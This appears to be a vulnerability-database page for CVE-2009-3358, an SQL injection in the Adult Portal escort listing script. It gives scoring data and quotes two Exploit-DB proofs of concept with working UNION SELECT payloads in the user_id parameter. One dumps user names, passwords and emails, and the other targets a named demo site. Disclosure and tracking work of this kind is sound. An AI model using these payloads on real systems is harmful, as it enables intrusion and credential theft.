CVE-2009-3358
published 2009-09-24CVE-2009-3358: SQL injection vulnerability in profile.php in Tourism Scripts Adult Portal escort listing allows remote attackers to execute arbitrary SQL commands via the…
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.94%
56.3th percentile
SQL injection vulnerability in profile.php in Tourism Scripts Adult Portal escort listing allows remote attackers to execute arbitrary SQL commands via the user_id parameter.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Adult Portal escort listing - 'user_id' SQL Injection
exploitdb·2009-09-10
CVE-2009-3358 Adult Portal escort listing - 'user_id' SQL Injection
Adult Portal escort listing - 'user_id' SQL Injection
---
###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## Remote SQL Injection Vulnerability ( profile.php user_id )
##
## Adult Portal escort listing
##
## http://www.tourismscripts.com/
##
###############################################################
###############################################################
##
## AuTh0r : Mr.SQL
##
## H0ME : WwW.55a.NeT
##
## Email : [email protected]
##
########################
########################
##
## -[[: ExploiteS :]]-
##
## www.TraGeT.CoM/profile.php?user_id=-1'+UNION+SELECT+0,CONCAT_WS(0x3a3a3a,user_name,password,email),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
Exploit-DB
Mole Adult Portal Script - 'profile.php?user_id' SQL Injection
exploitdb·2009-05-26
CVE-2009-4673 Mole Adult Portal Script - 'profile.php?user_id' SQL Injection
Mole Adult Portal Script - 'profile.php?user_id' SQL Injection
---
|| || | ||
o_,_7 _|| . _o_7 _|| q_|_|| o_w_,
( : / (_) / ( .
=By: Qabandi
=Email: iqa[a]hotmail.fr
From Kuwait PEACE
=Vuln: Mole Adult Portal Script - SQL Injection Vulnerability
=INFO: http://www.mole-group.com/scripts/scripts/adult-portal-escort-listing-script.html
=BUY: http://www.mole-group.com/scripts/scripts/payment.html
=DORK: --
-\18+/-
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@-SQL-Injection-PoC-@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Magic Quot. needs to be OFF
LIVE DEMO:
http://adult.mole-group.com/profile.php?user_id=-3%27%20UNION%20SELECT%201,unhex(hex(version())),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58
No writeups or analysis indexed.
2009-09-24
Published